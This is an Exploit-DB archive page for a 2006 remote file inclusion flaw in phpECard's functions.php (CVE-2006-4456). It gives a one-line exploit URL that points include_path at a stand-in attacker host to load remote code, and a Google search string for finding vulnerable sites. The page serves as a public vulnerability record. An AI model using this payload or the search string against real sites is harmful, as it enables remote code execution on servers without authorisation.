PHPECard 2.1.4 - 'functions.php' Remote File Inclusion

EDB-ID:

2275

CVE:

2006-4456

EDB Verified:

Author:

LeAk

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2006-08-29

Vulnerable App:

#==============================================================================================
# phpECard (functions.php) Remote File Inclusion Exploit
#===============================================================================================
#                                                                          
#Critical Level : Dangerous                                                
#                                                                          
#Venedor site : http://www.quick-xs.net/phpecard/
#          
#Google Search: powered by: phpecard                                                                                                                          
#                                                             
#================================================================================================
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/functions.php?include_path=http://evil_script?
#
#
#================================================================================================
#Discoverd By : LeAk
#
#Conatact : Escape_LeAk[at]yahoo.com
#
# Turkis Hackers
==================================================================================================

# milw0rm.com [2006-08-29]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services